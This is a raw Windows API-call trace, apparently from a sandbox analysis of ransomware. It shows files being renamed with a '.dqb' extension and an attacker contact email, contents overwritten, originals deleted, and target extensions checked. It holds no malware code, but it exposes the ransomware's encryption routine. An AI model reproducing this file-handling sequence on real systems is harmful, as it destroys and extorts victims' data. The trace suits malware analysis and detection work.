[0059.290] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0059.291] ReadFile (in: hFile=0x15c, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0059.291] WriteFile (in: hFile=0x1e4, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.291] SetEndOfFile (hFile=0x1e4) returned 1 [0059.291] CloseHandle (hObject=0x1e4) returned 1 [0059.291] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0059.291] SetEndOfFile (hFile=0x15c) returned 1 [0059.292] CloseHandle (hObject=0x15c) returned 1 [0059.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.292] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 1 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0059.292] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0059.292] lstrlenW (lpString=".doc") returned 4 [0059.292] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.292] lstrlenW (lpString=".docx") returned 5 [0059.292] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.292] lstrlenW (lpString=".pdf") returned 4 [0059.292] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.292] lstrlenW (lpString=".xls") returned 4 [0059.293] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.293] lstrlenW (lpString=".xlsx") returned 5 [0059.293] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.293] lstrlenW (lpString=".ppt") returned 4 [0059.293] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0059.293] lstrlenW (lpString=".zip") returned 4 [0059.293] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.293] lstrlenW (lpString=".rar") returned 4 [0059.293] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.293] lstrlenW (lpString=".bz2") returned 4 [0059.293] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.293] lstrlenW (lpString=".7z") returned 3 [0059.293] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0059.293] lstrlenW (lpString=".dbf") returned 4 [0059.293] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0059.293] lstrlenW (lpString=".1cd") returned 4 [0059.293] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.293] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0059.293] lstrlenW (lpString=".jpg") returned 4 [0059.293] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.563] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0060.564] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0060.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01173_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01173_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 14 os_tid = 0xad4 [0032.435] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x38a0480 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x38b0488 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0360 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5c30c0 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0378 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3b90020 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0390 [0032.436] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0390, Size=0x20) returned 0x5a5c78 [0032.436] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c0390 [0032.436] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c0390, Size=0x20) returned 0x5a5ca0 [0032.436] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.437] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.437] Wow64DisableWow64FsRedirection (in: OldValue=0x303ff58 | out: OldValue=0x303ff58*=0x0) returned 1 [0032.437] lstrlenW (lpString="kernel32.dll") returned 12 [0032.437] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.437] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.437] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.437] Sleep (dwMilliseconds=0x64) [0032.620] Sleep (dwMilliseconds=0x64) [0033.065] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0033.065] lstrlenW (lpString="PptLR.cab") returned 9 [0033.065] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.379] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=70361744) returned 1 [0033.379] CloseHandle (hObject=0x184) returned 1 [0033.379] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab")) returned 0x2020 [0033.379] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.379] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0034.216] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.216] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0034.217] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.217] ReadFile (in: hFile=0x184, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.231] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.231] ReadFile (in: hFile=0x184, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.242] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0034.242] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.242] ReadFile (in: hFile=0x184, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0034.272] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.272] WriteFile (in: hFile=0x184, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0034.617] SetEndOfFile (hFile=0x184) returned 1 [0034.617] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3f024c0 [0034.618] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.618] WriteFile (in: hFile=0x184, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.618] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x165e0da, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.618] WriteFile (in: hFile=0x184, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.619] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x42da290, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.619] WriteFile (in: hFile=0x184, lpBuffer=0x3f024c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f024c0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.621] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3f024c0 | out: hHeap=0x570000) returned 1 [0034.621] CloseHandle (hObject=0x184) returned 1 [0037.970] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0037.970] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.970] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.970] lstrlenW (lpString=".doc") returned 4 [0037.970] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0037.970] lstrlenW (lpString=".docx") returned 5 [0037.970] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0037.970] lstrlenW (lpString=".pdf") returned 4 [0037.970] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0037.970] lstrlenW (lpString=".xls") returned 4 [0037.970] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0037.970] lstrlenW (lpString=".xlsx") returned 5 [0037.970] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0037.970] lstrlenW (lpString=".ppt") returned 4 [0037.970] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0037.970] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.970] lstrlenW (lpString=".zip") returned 4 [0037.970] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0037.970] lstrlenW (lpString=".rar") returned 4 [0037.970] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0037.970] lstrlenW (lpString=".bz2") returned 4 [0037.970] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0037.971] lstrlenW (lpString=".7z") returned 3 [0037.971] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString=".dbf") returned 4 [0037.971] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString=".1cd") returned 4 [0037.971] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString=".jpg") returned 4 [0037.971] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString=".doc") returned 4 [0037.971] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString=".docx") returned 5 [0037.971] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0037.971] lstrlenW (lpString=".pdf") returned 4 [0037.971] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString=".xls") returned 4 [0037.971] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString=".xlsx") returned 5 [0037.971] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0037.971] lstrlenW (lpString=".ppt") returned 4 [0037.971] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString=".zip") returned 4 [0037.971] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString=".rar") returned 4 [0037.971] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0037.971] lstrlenW (lpString=".bz2") returned 4 [0037.971] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0037.971] lstrlenW (lpString=".7z") returned 3 [0037.971] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0037.971] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.971] lstrlenW (lpString=".dbf") returned 4 [0037.971] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.972] lstrlenW (lpString=".1cd") returned 4 [0037.972] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0037.972] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 72 [0037.972] lstrlenW (lpString=".jpg") returned 4 [0037.972] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0037.972] lstrcmpiW (lpString1=".cab", lpString2=".dqb") returned -1 [0037.972] lstrlenW (lpString="Proof.cab") returned 9 [0037.972] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0037.972] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=11482605) returned 1 [0037.972] CloseHandle (hObject=0x184) returned 1 [0037.972] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab")) returned 0x2020 [0037.972] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0037.972] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0038.445] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0038.446] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0x0) returned 1 [0038.446] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.446] ReadFile (in: hFile=0x184, lpBuffer=0x3b90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b90058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.450] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.450] ReadFile (in: hFile=0x184, lpBuffer=0x3bd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bd0058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.452] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x303fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0038.452] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x303fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.452] ReadFile (in: hFile=0x184, lpBuffer=0x3c10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x303fc38, lpOverlapped=0x0 | out: lpBuffer=0x3c10058*, lpNumberOfBytesRead=0x303fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.466] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.466] WriteFile (in: hFile=0x184, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x303fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0038.732] SetEndOfFile (hFile=0x184) returned 1 [0038.732] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3fea4f0 [0038.732] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.732] WriteFile (in: hFile=0x184, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.733] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.733] WriteFile (in: hFile=0x184, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.735] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x303fc7c | out: lpNewFilePointer=0x0) returned 1 [0038.735] WriteFile (in: hFile=0x184, lpBuffer=0x3fea4f0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x303fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fea4f0*, lpNumberOfBytesWritten=0x303fc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.737] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0038.737] CloseHandle (hObject=0x184) returned 1 [0041.209] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0041.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.209] lstrlenW (lpString=".doc") returned 4 [0041.209] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.209] lstrlenW (lpString=".docx") returned 5 [0041.209] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0041.209] lstrlenW (lpString=".pdf") returned 4 [0041.209] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.209] lstrlenW (lpString=".xls") returned 4 [0041.209] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.209] lstrlenW (lpString=".xlsx") returned 5 [0041.209] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0041.209] lstrlenW (lpString=".ppt") returned 4 [0041.209] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0041.209] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString=".zip") returned 4 [0041.210] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString=".rar") returned 4 [0041.210] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString=".bz2") returned 4 [0041.210] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0041.210] lstrlenW (lpString=".7z") returned 3 [0041.210] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0041.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString=".dbf") returned 4 [0041.210] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString=".1cd") returned 4 [0041.210] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0041.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString=".jpg") returned 4 [0041.210] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0041.210] lstrlenW (lpString=".doc") returned 4 [0041.210] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString=".docx") returned 5 [0041.210] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0041.210] lstrlenW (lpString=".pdf") returned 4 [0041.210] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString=".xls") returned 4 [0041.210] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0041.210] lstrlenW (lpString=".xlsx") returned 5 [0041.210] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0041.210] lstrlenW (lpString=".ppt") returned 4 [0041.210] lstrcmpiW (lpString1=".ppt", 